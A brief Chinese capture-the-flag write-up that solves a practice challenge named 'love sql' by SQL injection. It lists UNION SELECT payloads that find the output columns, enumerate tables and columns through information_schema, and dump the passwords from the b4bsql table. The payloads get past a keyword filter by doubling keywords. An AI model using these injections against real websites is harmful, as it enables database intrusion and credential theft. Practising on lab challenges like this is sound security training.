做完了baby sql来到了love sql发现这个注入相比baby sql容易的多
我们还是像baby sql中注入方式一样
于是构造pyload: ?username=admin&password=admin' union select 1,2,3%23
两个回显位
于是就爆数据表:?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23
再爆表字段:?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'%23
爆数据:?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23
于是一次love sql注入就完成了